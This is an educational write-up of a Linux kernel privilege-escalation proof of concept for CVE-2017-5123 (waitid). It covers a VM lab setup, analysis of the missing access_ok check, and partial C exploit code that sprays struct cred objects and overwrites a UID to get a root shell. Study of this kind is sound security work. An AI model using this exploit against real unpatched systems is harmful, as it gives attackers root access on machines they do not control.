# CVE-2017-5123
PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR
> [The waitid implementation in upstream kernels did not restrict the target destination to copy information results. This can allow local users to write to otherwise protected kernel memory, which can lead to privilege escalation.](https://access.redhat.com/security/cve/cve-2017-5123 "Reference")
## Introduction
In this short writeup, I will analyze a kernel vulnerability that allows us to obtain _root_ privileges.
This file is divided into four parts:
1. [VM setup](https://github.com/c3r34lk1ll3r/CVE-2017-5123#vm-setup);
2. [vulnerability analysis](https://github.com/c3r34lk1ll3r/CVE-2017-5123#vulnerability);
3. [exploitation](https://github.com/c3r34lk1ll3r/CVE-2017-5123#exploitation);
4. [PoC](https://github.com/c3r34lk1ll3r/CVE-2017-5123#poc).
Note that there are much better ways to exploit this CVE: this is just a _PoC_ for learning about the kernel and it can't be used _in the wild_. Still, I think that this methodology can be useful as an introduction to kernel exploitation.
## VM Setup
### Kernel Build
This vulnerability was introduced in commit _4c48abe91be0_, so we need to build that version of the kernel.
This can be a little tricky because it is an old version and the code needs to be patched.
I made a [repository](https://github.com/c3r34lk1ll3r/kernel_mirror/tree/modified_v4.14) with an already patched kernel code and a [`.config`](https://gist.github.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8) file so you can _clone and build_.
```shell
git clone https://github.com/c3r34lk1ll3r/kernel_mirror.git
cd kernel_mirror
git checkout origin/modified_v4.14
wget https://gist.githubusercontent.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8/raw/52431b577a71e3fe8f89d6ce355ce9c1c54c53b6/.config
make -j 8 --output-sync=recurse
```
Note that this kernel is built with _virtio_ drivers, so you can use a _virtio disk_ to share files with the VM.
### Rootfs Setup
Now, we will create the initial _rootfs_:
```shell
qemu-img create -f raw hda.raw 10G
# Format the disk to ext4
mkfs.ext4 ./hda.raw
# Make a mountpoint for the image
mkdir /tmp/mount1
# Mount the disk
sudo mount -o loop ./hda.raw /tmp/mount1
```
Then, we should install a basic Linux distribution, for example using `pacstrap` or `debootstrap`.
```shell
sudo pacstrap /tmp/mount1 base base-devel vim
```
Finally, we can modify the system:
```shell
# Add a 'test' user
echo 'test:x:1000:1000::/home/test:/bin/bash' | sudo tee -a /tmp/mount1/etc/passwd
# without password
echo 'test::14871::::::' | sudo tee -a /tmp/mount1/etc/shadow
# we can mount a virtio disk in order to share files between host and guest
echo '/transient /home/test/shared 9p trans=virtio,version=9p2000.L,rw,user,exec 0 0' | sudo tee -a /tmp/mount1/etc/fstab
sudo mkdir -p /tmp/mount1/home/test/shared
# It is useful to have sudo permission
echo '%wheel ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /tmp/mount1/etc/sudoers
echo 'wheel:x:998:test' | sudo tee -a /tmp/mount1/etc/group
sudo chown -R 1000:1000 /tmp/mount1/home/test
sudo umount /tmp/mount1
```
If everything is in order, we can now try our testing system with _qemu_:
```shell
qemu-system-x86_64 \
-kernel ./kernel_mirror/arch/x86_64/boot/bzImage \
-hda ./hda.raw \
-m 4G \
-cpu "Skylake-Client-IBRS,ss=on,vmx=on,hypervisor=on,tsc-adjust=on,clflushopt=on,umip=on,md-clear=on,stibp=on,arch-capabilities=on,ssbd=on,xsaves=on,pdpe1gb=on,ibpb=on,amd-ssbd=on,skip-l1dfl-vmentry=on,hle=off,rtm=off" \
-smp 4 \
-vga virtio \
-enable-kvm \
-nographic \
-machine type=q35,accel=kvm \
-virtfs "fsdriver=local,id=fs.1,path=./trans_fs,security_model=mapped,writeout=immediate,mount_tag=/transient" \
-append "root=/dev/sda rw noquiet nokaslr console=ttyS0 loglevel=5" \
-chardev "vc,id=vc.0,cols=1920,rows=1080" \
-net "user,hostfwd=tcp::10022-:22" \
-net "nic" \
-s
```
## Vulnerability
The description of the CVE says that there is an unrestricted write operation during the `waitid` system call.
Let's open `kernel/exit.c` and look at the code:
```c
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
```
This function is pretty straightforward: after a few checks, there are several calls to `unsafe_put_user(...)` and the function returns.
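To see which values end up in those fields, here is a minimal userspace sketch of a legitimate `waitid` call, where `infop` points to our own writable memory. The helper name `reap_child` is hypothetical and is not part of the PoC.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Fork a child that exits with `exit_code`, reap it with waitid() and
 * store the result in `out`. Returns 0 on success, -1 on error.
 * `reap_child` is a hypothetical helper used only in this sketch.
 */
int reap_child(int exit_code, siginfo_t *out)
{
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(exit_code);           /* child: terminate immediately */

    memset(out, 0, sizeof(*out));
    /* Legitimate use: the kernel fills a siginfo_t that lives in user space. */
    if (waitid(P_PID, (id_t)pid, out, WEXITED) != 0)
        return -1;
    return (out->si_pid == pid) ? 0 : -1;
}
```

After a successful call, `si_signo` holds `SIGCHLD`, `si_errno` holds `0`, `si_code` holds the cause (`CLD_EXITED` for a normal exit) and `si_status` holds the exit code, which matches the `unsafe_put_user` sequence in the kernel code.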
The core of this function is the `unsafe_put_user(...)` macro, so let's move there (`arch/x86/include/asm/uaccess.h`):
```c
/*
* The "unsafe" user accesses aren't really "unsafe", but the naming
* is a big fat warning: you have to not only do the access_ok()
* checking before using them, but you have to surround them with the
* user_access_begin/end() pair.
*/
#define user_access_begin() __uaccess_begin()
#define user_access_end() __uaccess_end()
#define unsafe_put_user(x, ptr, err_label) \
do { \
int __pu_err; \
__typeof__(*(ptr)) __pu_val = (x); \
__put_user_size(__pu_val, (ptr), sizeof(*(ptr)), __pu_err, -EFAULT); \
if (unlikely(__pu_err)) goto err_label; \
} while (0)
#define unsafe_get_user(x, ptr, err_label) \
do { \
int __gu_err; \
__inttype(*(ptr)) __gu_val; \
__get_user_size(__gu_val, (ptr), sizeof(*(ptr)), __gu_err, -EFAULT); \
(x) = (__force __typeof__(*(ptr)))__gu_val; \
if (unlikely(__gu_err)) goto err_label; \
} while (0)
```
There is a **big fat warning** in the comment: if you want to use `unsafe_put/get_user` you should first call `access_ok()` and surround them with `user_access_begin/end()`.
If we take a look at the previous code (`waitid`) we can see that `access_ok()` is never called so the system call _violates_ this _warning_.
But what are those macros?
### SMAP/SMEP
_SMAP_ and _SMEP_ are two security features that make exploits harder to write. Note that both are enforced by the CPU.
_SMEP_ (Supervisor Mode Execution Prevention) prevents the CPU from **executing** userspace code while it is in supervisor mode; _SMAP_ (Supervisor Mode Access Prevention), instead, blocks **read/write** access to user memory.
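Before testing, it can be useful to confirm that the guest CPU actually exposes both features. The following is a minimal sketch that looks for a flag in the `flags` line of `/proc/cpuinfo`; the helper names `has_flag` and `cpu_has_flag` are hypothetical, and the sketch assumes an x86 Linux guest.

```c
#include <stdio.h>
#include <string.h>

/* Return 1 if `flag` appears as a whole word in the space-separated `list`. */
int has_flag(const char *list, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = list;

    if (n == 0)
        return 0;
    while ((p = strstr(p, flag)) != NULL) {
        int starts = (p == list) || p[-1] == ' ' || p[-1] == '\t';
        int ends = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';

        if (starts && ends)
            return 1;
        p += n;
    }
    return 0;
}

/*
 * Return 1 if the first "flags" line of /proc/cpuinfo lists `flag`,
 * 0 if it does not, -1 if the file cannot be opened.
 */
int cpu_has_flag(const char *flag)
{
    char line[8192];
    int found = 0;
    FILE *f = fopen("/proc/cpuinfo", "r");

    if (!f)
        return -1;
    while (fgets(line, sizeof(line), f)) {
        if (strncmp(line, "flags", 5) == 0) {
            found = has_flag(line, flag);
            break;
        }
    }
    fclose(f);
    return found;
}
```

Calling `cpu_has_flag("smep")` and `cpu_has_flag("smap")` inside the VM should both return `1` if the `-cpu` model passed to _qemu_ provides them.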
The kernel still needs to read and write user memory, and this can be accomplished in two ways:
1. using functions (e.g. `copy_from_user`) that copy the memory into kernel space;
2. temporarily disabling _SMAP_.
As we can see in the definition of `unsafe_put_user`, this macro only copies the value of `x` into the memory pointed to by `ptr` (and jumps to `err_label` if there is an error). We have just said that the kernel can't access userspace memory because of _SMAP_, and this is why these macros must be wrapped between `user_access_begin/end()`.
```c
#define __uaccess_begin() stac()
#define __uaccess_end() clac()
```
As we can see, `user_access_begin/end` are simply the _ASM_ instructions `stac` and `clac`.
- `stac`: "Sets the AC flag bit in EFLAGS register. This may enable alignment checking of user-mode data accesses. This allows explicit supervisor-mode data accesses to user-mode pages even if the SMAP bit is set in the CR4 register."
- `clac`: "Clears the AC flag bit in EFLAGS register. This disables any alignment checking of user-mode data accesses. If the SMAP bit is set in the CR4 register, this disallows explicit supervisor-mode data accesses to user-mode pages."
Basically, these two macros temporarily disable and re-enable _SMAP_ enforcement.
The earlier "warning" also mentions the `access_ok` macro:
```c
/**
* access_ok: - Checks if a user space pointer is valid
* @type: Type of access: %VERIFY_READ or %VERIFY_WRITE. Note that
* %VERIFY_WRITE is a superset of %VERIFY_READ - if it is safe
* to write to a block, it is always safe to read from it.
* @addr: User space pointer to start of block to check
* @size: Size of block to check
*
* Context: User context only. This function may sleep if pagefaults are
* enabled.
*
* Checks if a pointer to a block of memory in user space is valid.
*
* Returns true (nonzero) if the memory block may be valid, false (zero)
* if it is definitely invalid.
*
* Note that, depending on architecture, this function probably just
* checks that the pointer is in the user space range - after calling
* this function, memory access functions may still return -EFAULT.
*/
#define access_ok(type, addr, size) \
({ \
WARN_ON_IN_IRQ(); \
likely(!__range_not_ok(addr, size, user_addr_max())); \
})
```
The comment here is self-explanatory: this macro checks whether the pointer is a valid **user space pointer**.
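The range test behind `access_ok` can be modeled in userspace. This is only a sketch: `model_access_ok` is a hypothetical name, and `USER_ADDR_MAX` is an assumed limit for x86-64 with 4-level paging, not a value read from the running kernel.

```c
#include <stdint.h>

/* Assumed upper limit of user space on x86-64 with 4-level paging. */
#define USER_ADDR_MAX 0x00007ffffffff000ULL

/*
 * Model of the range check: return 1 if the block [addr, addr + size)
 * does not wrap around and ends at or below the user-space limit.
 */
int model_access_ok(uint64_t addr, uint64_t size)
{
    uint64_t end = addr + size;

    if (end < addr)             /* addr + size overflowed */
        return 0;
    return end <= USER_ADDR_MAX;
}
```

With this model, a pointer into the kernel half of the address space (for example `0xffff880000000000`) is rejected, which is exactly the check that `waitid` skips.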
### Arbitrary write
Let's take another look at the `waitid` code:
```c
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
```
As you have already guessed, the absence of `access_ok()` leads to an _arbitrary write anywhere_ in memory, because the `infop` pointer is completely controlled by the attacker.
### Trigger the bug
It's really easy to reach the vulnerable path, and we can create a _trigger_ with this simple code:
```c
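#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

// Set by the child once it is running; volatile because both tasks share memory (CLONE_VM)
volatile int thread_ready;
int die_thread(void *arg){
    thread_ready=1;
    syscall(__NR_sched_yield);
    return 0;
}
void *stack; // Top of the child's stack, allocated by the caller
int trigger_bug(uint64_t where, int what){
    printf("[0] Trying to overwrite 0x%016lx\r", where);
    //int pid = fork(); // It is also possible to use fork syscall
    thread_ready = 0;
    int pid = clone(die_thread, stack, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
    int err;
    while(thread_ready == 0) {syscall(__NR_sched_yield);} // Wait until the child has started
    // 'where' is passed as infop without any check
    err = syscall(__NR_waitid, P_PID, pid, where, WEXITED, NULL);
    return err;
}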
```
This simple code triggers the vulnerability and writes to the memory pointed to by the **where** address.
We can use _gdb_ to check this trigger. For example, we can select an _arbitrary_ address and use the `trigger_bug` function to overwrite it.
## Exploitation
This vulnerability can be exploited in various ways, but I prefer a very simple approach.
Remember that we can write anywhere we want, but the data written is only partially controlled. We can, however, overwrite an address with **0**.
The basic idea is to overwrite the _UID_ of our process and become _root_, but we first need to understand what credentials are in Linux.
### Fork
We start by digging into the _fork_ system call, which is used to create new processes.
We can check the code in `kernel/fork.c`:
```c
SYSCALL_DEFINE0(fork)
{
return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}
```
So, `fork` system call is simply a wrapper for `_do_fork` with _hardcoded_ parameters.
This last function is a bit long but we can summarize it in this way:
```c
long _do_fork(unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *parent_tidptr,
int __user *child_tidptr,
unsigned long tls)
{
struct task_struct *p;
int trace = 0;
long nr;
......
// This creates another task struct but does NOT start the process.
p = copy_process(clone_flags, stack_start, stack_size,
child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
add_latent_entropy();
......
// Wake up the newly created task: set its state to RUNNING and enqueue it on the run queue
wake_up_new_task(p);
......
put_pid(pid);
} else {
nr = PTR_ERR(p);
}
return nr;
}
```
This function allocates a new `task_struct` object. Although this structure is really important (it describes a process), we will focus our attention on its `cred` field:
```c
...
/* Process credentials: */
/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
```
As we can see, there are three pointers to `struct cred`. Let's see how this structure is laid out (`include/linux/cred.h`):
```c
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
......
```
As we can see, the _UID_ of a process is simply an _unsigned integer_ (follow the definition of `kuid_t`), so we can overwrite this value with `0` in order to become _root_.
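To make the layout concrete, here is a userspace mock of the first fields of `struct cred`. It is only a sketch: all `mock_*` names are hypothetical, it assumes `CONFIG_DEBUG_CREDENTIALS` is disabled, and it ignores every field after `fsgid` (capabilities, keyrings and so on).

```c
#include <stddef.h>
#include <stdint.h>

/* kuid_t and kgid_t wrap a single 32-bit unsigned value. */
typedef struct { uint32_t val; } mock_kuid_t;
typedef struct { uint32_t val; } mock_kgid_t;

/* Mock of the start of struct cred, without the debug-only fields. */
struct mock_cred {
    int32_t     usage;   /* atomic_t wraps an int */
    mock_kuid_t uid;     /* real UID */
    mock_kgid_t gid;     /* real GID */
    mock_kuid_t suid;    /* saved UID */
    mock_kgid_t sgid;    /* saved GID */
    mock_kuid_t euid;    /* effective UID */
    mock_kgid_t egid;    /* effective GID */
    mock_kuid_t fsuid;   /* UID for VFS ops */
    mock_kgid_t fsgid;   /* GID for VFS ops */
};

/* Return 1 if every ID in the mock is 0, i.e. the IDs of root. */
int mock_is_root(const struct mock_cred *c)
{
    return c->uid.val == 0 && c->gid.val == 0 &&
           c->suid.val == 0 && c->sgid.val == 0 &&
           c->euid.val == 0 && c->egid.val == 0 &&
           c->fsuid.val == 0 && c->fsgid.val == 0;
}
```

In this mock the eight IDs are contiguous 4-byte values that start right after `usage`, which is why writing zeros over them is enough to change what `getuid` reports.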
### Copy_process
The `task_struct` structure is allocated in the `copy_process` function, which is a bit complex; its main goal is to "copy" the process into a new one.
We can focus on `copy_creds(p, clone_flags)`, which is defined as:
```c
/*
* Copy credentials for the new process created by fork()
*
* We share if we can, but under some circumstances we have to generate a new
* set.
*
* The new process gets the current process's subjective credentials as its
* objective and subjective credentials
*/
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
if (
#ifdef CONFIG_KEYS
!p->cred->thread_keyring &&
#endif
clone_flags & CLONE_THREAD
) {
p->real_cred = get_cred(p->cred);
get_cred(p->cred);
alter_cred_subscribers(p->cred, 2);
kdebug("share_creds(%p{%d,%d})",
p->cred, atomic_read(&p->cred->usage),
read_cred_subscribers(p->cred));
atomic_inc(&p->cred->user->processes);
return 0;
}
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
.........
error_put:
put_cred(new);
return ret;
}
```
As we can see, this function calls `prepare_creds`, where the real allocation is performed.
We now have a path to allocate a (pseudo-)arbitrary number of `struct cred` objects:
1. `_do_fork()`
2. `copy_process()`
3. `copy_creds()`
Our last problem is how to call `_do_fork()` from userspace. We can use `fork`, but this can be slow, so we will use `clone` instead.
**Note**: we can't use `pthread` because of its flags: if you look at the code of `copy_creds`, you will notice that with `CLONE_THREAD` the structure is shared with the parent instead of being allocated.
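The first branch of `copy_creds` can be modeled as a small predicate on the clone flags. This is a sketch: `model_shares_cred` and the two flag macros are hypothetical names, and `PTHREAD_LIKE_FLAGS` lists only some of the flags a thread library passes (the relevant one is `CLONE_THREAD`).

```c
#include <linux/sched.h>   /* CLONE_* flag values */
#include <signal.h>        /* SIGCHLD */

/* Flags used by the clone() calls in this writeup. */
#define POC_CLONE_FLAGS \
    (CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | SIGCHLD)

/* A subset of the flags used for threads; CLONE_THREAD is what matters. */
#define PTHREAD_LIKE_FLAGS \
    (CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SIGHAND | CLONE_THREAD | \
     CLONE_SYSVSEM)

/*
 * Model of the first branch in copy_creds(). `has_thread_keyring` stands
 * for "p->cred->thread_keyring != NULL" on kernels built with CONFIG_KEYS.
 * Returns 1 if the child shares the parent's struct cred, 0 if a new one
 * is allocated through prepare_creds().
 */
int model_shares_cred(unsigned long clone_flags, int has_thread_keyring)
{
    if (!has_thread_keyring && (clone_flags & CLONE_THREAD))
        return 1;   /* get_cred(): only the reference count is bumped */
    return 0;       /* prepare_creds(): a new struct cred is allocated */
}
```

`model_shares_cred(POC_CLONE_FLAGS, 0)` returns `0`, so every `clone` call with these flags goes through `prepare_creds`, while thread-like flags return `1` and add nothing to the spray.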
## Put it all together
Now, a little recap:
1. we are able to trigger the bug and write to memory;
2. we know that we can write `0` to memory;
3. we know that if we overwrite the _UID_ of a process with `0`, it obtains _root_ permissions.
Now we need to know **where** to write in memory and, although KASLR is disabled, the address of a `struct cred` is not stable enough, so I decided to proceed with _memory spraying_.
## Spraying
We need to find the `struct cred` in memory in order to detect a range of addresses. We can use _gdb_ and _python_ with a script like [this](https://github.com/c3r34lk1ll3r/CVE-2017-5123/blob/master/creds.py):
```python
....
for task in task_lists():
#gdb.write("{address} {pid} {comm}\n".format(
# address=task,
# pid=task["pid"],
# comm=task["comm"].string()))
comm = task["comm"].string()
# Insert your executable name
if comm == "exploit":
print(task['cred'])
....
```
**Note**: this script works only with KASLR disabled and with debug symbols (we need the `init_task` pointer).
After a few tries we can see that the heap grows down, so we can start from a lower address and move up.
Now we can use the `clone` system call to spawn a lot of processes and, thanks to _gdb_, we can check the addresses:
```c
stack = malloc(STACK_SIZE);
if (!stack){
    perror("[-] Malloc");
    return -1;
}
stack = (char *)stack + STACK_SIZE; // clone() expects the top of the stack
for(x=0;x<MAX_THREADS;x++){
    // Check the allocation before computing the top of the stack
    char *stackBase = malloc(STACK_SIZE);
    if (!stackBase){
        perror("[-] Malloc");
        return -1;
    }
    stackTop = stackBase + STACK_SIZE;
    // spray_thread can simply be an infinite loop
    pid = clone(spray_thread, stackTop, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
    if (pid == -1){
        perror("\n\nCLONE");
        return -1;
    }
    printf("[0] Process created: %d\r", x);
}
```
**Note**: Maybe you can't spawn more than 4k processes. Check [_ulimits_](https://access.redhat.com/solutions/61334) if this is the case.
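The limit can also be read from inside the program with `getrlimit`. A minimal sketch, with the hypothetical helper names `get_nproc_limit` and `limit_allows`:

```c
#include <sys/resource.h>

/* Read the soft and hard RLIMIT_NPROC values. Returns 0 on success. */
int get_nproc_limit(rlim_t *soft, rlim_t *hard)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) != 0)
        return -1;
    *soft = rl.rlim_cur;
    *hard = rl.rlim_max;
    return 0;
}

/*
 * Return 1 if `wanted` processes fit under the soft limit `soft`.
 * This is a rough check: the limit counts every process already owned
 * by the user, not only the ones we are about to create.
 */
int limit_allows(rlim_t soft, unsigned long wanted)
{
    return soft == RLIM_INFINITY || wanted <= soft;
}
```

If `limit_allows(soft, MAX_THREADS)` returns `0`, the `clone` loop is expected to fail before reaching `MAX_THREADS`.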
## PoC
Finally, we can write our _PoC_.
It is sufficient to call `trigger_bug` with different addresses (searching for the structure) while each spawned thread checks its _UID_, like this:
```c
struct shared_area{
int one_win;
};
struct shared_area glob_var;
// Sprayed thread
int spray_thread(void *arg){
int uid;
int previous_one = syscall(__NR_getuid);
// Loop over syscall getUID
while(1){
uid = syscall(__NR_getuid);
//printf("UID: %d\n",uid);
// If the returned UID differs from the previous one, we have hit a struct cred area
if (uid != previous_one){
printf("WIN!! with %d", uid);
// Kill the other threads in order to stabilize the system
glob_var.one_win = 1;
// Simply spawn a shell
system("/bin/sh");
}
if(glob_var.one_win == 1)
return 1;
}
return 0;
}
```
There is a 50% probability of hitting the structure, so after a few runs you can obtain _root_ privileges.

## Conclusion
This is a (basic) _PoC_ and the spraying is far from perfect. This is just an "introduction" to the amazing world of the kernel; there are a lot of concepts that I skipped but that are extremely important (like memory management). If you want to study further, you can take a look at `prepare_creds` and the memory allocations.
KASLR is disabled, but this vulnerability also allows bypassing this mitigation (`unsafe_put_user` doesn't crash on an invalid address). However, I don't think that adding a new "layer" of bruteforcing is useful if your goal is to learn about the kernel. If your objective is to use this vulnerability _in the wild_, you should write a different exploit (at least, with different spraying).
Food for thought: I used this vulnerability to understand and try the `ret2dir` technique (Hint: you can trigger the write on the alias address and read the modification through the userspace address).
## Reference
- https://salls.github.io/Linux-Kernel-CVE-2017-5123/
- https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html